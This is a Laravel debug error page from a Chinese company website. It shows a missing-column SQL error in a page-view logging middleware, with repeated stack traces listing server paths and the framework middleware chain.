SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list' (SQL: insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (2024-03-28 17:26:10, 44.222.212.138, 2024-03-28, ?, http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html))

  at /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:671
  at Illuminate\Database\Connection->runQueryCallback('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:631)
  at Illuminate\Database\Connection->run('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:496)
  at Illuminate\Database\Connection->affectingStatement('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php:2822)
  at Illuminate\Database\Query\Builder->insertOrIgnore(array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1422)
  at Illuminate\Database\Eloquent\Builder->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Support/Traits/ForwardsCalls.php:23)
  at Illuminate\Database\Eloquent\Model->forwardCallTo(object(Builder), 'insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1736)
  at Illuminate\Database\Eloquent\Model->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1748)
  at Illuminate\Database\Eloquent\Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:77)
  at App\Miya\Middlewares\UserView->addViewRecord()
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:29)
  at App\Miya\Middlewares\UserView->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php:20)
  at App\Miya\Middlewares\CopyrightSign->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php:23)
  at App\Miya\Middlewares\RegularClearCache->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php:32)
  at App\Miya\Middlewares\SourceCode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php:19)
  at App\Miya\Middlewares\SensitiveWord->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php:21)
  at App\Miya\Middlewares\CacheCheck->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php:41)
  at Illuminate\Routing\Middleware\SubstituteBindings->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:78)
  at Illuminate\Foundation\Http\Middleware\VerifyCsrfToken->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49)
  at Illuminate\View\Middleware\ShareErrorsFromSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:116)
  at Illuminate\Session\Middleware\StartSession->handleStatefulRequest(object(Request), object(Store), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:62)
  at Illuminate\Session\Middleware\StartSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37)
  at Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:67)
  at Illuminate\Cookie\Middleware\EncryptCookies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:687)
  at Illuminate\Routing\Router->runRouteWithinStack(object(Route), object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:662)
  at Illuminate\Routing\Router->runRoute(object(Request), object(Route))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:628)
  at Illuminate\Routing\Router->dispatchToRoute(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:617)
  at Illuminate\Routing\Router->dispatch(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:165)
  at Illuminate\Foundation\Http\Kernel->Illuminate\Foundation\Http\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:128)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php:26)
  at App\Miya\Middlewares\FuckYou->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php:27)
  at Illuminate\Foundation\Http\Middleware\ValidatePostSize->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:63)
  at Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fruitcake/laravel-cors/src/HandleCors.php:37)
  at Fruitcake\Cors\HandleCors->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fideloper/proxy/src/TrustProxies.php:57)
  at Fideloper\Proxy\TrustProxies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:140)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:109)
  at Illuminate\Foundation\Http\Kernel->handle(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php:58)                

[2/3] Exception

Doctrine\DBAL\Driver\PDO\Exception:
SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list'

  at /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDO/Exception.php:18
  at Doctrine\DBAL\Driver\PDO\Exception::new(object(PDOException))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:84)
  at Doctrine\DBAL\Driver\PDOConnection->prepare('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)')
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:485)
  at Illuminate\Database\Connection->Illuminate\Database\{closure}('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:664)
  at Illuminate\Database\Connection->runQueryCallback('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:631)
  at Illuminate\Database\Connection->run('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:496)
  at Illuminate\Database\Connection->affectingStatement('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php:2822)
  at Illuminate\Database\Query\Builder->insertOrIgnore(array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1422)
  at Illuminate\Database\Eloquent\Builder->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Support/Traits/ForwardsCalls.php:23)
  at Illuminate\Database\Eloquent\Model->forwardCallTo(object(Builder), 'insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1736)
  at Illuminate\Database\Eloquent\Model->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1748)
  at Illuminate\Database\Eloquent\Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:77)
  at App\Miya\Middlewares\UserView->addViewRecord()
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:29)
  at App\Miya\Middlewares\UserView->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php:20)
  at App\Miya\Middlewares\CopyrightSign->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php:23)
  at App\Miya\Middlewares\RegularClearCache->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php:32)
  at App\Miya\Middlewares\SourceCode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php:19)
  at App\Miya\Middlewares\SensitiveWord->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php:21)
  at App\Miya\Middlewares\CacheCheck->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php:41)
  at Illuminate\Routing\Middleware\SubstituteBindings->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:78)
  at Illuminate\Foundation\Http\Middleware\VerifyCsrfToken->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49)
  at Illuminate\View\Middleware\ShareErrorsFromSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:116)
  at Illuminate\Session\Middleware\StartSession->handleStatefulRequest(object(Request), object(Store), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:62)
  at Illuminate\Session\Middleware\StartSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37)
  at Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse->handle(object(Request), object(Closure))
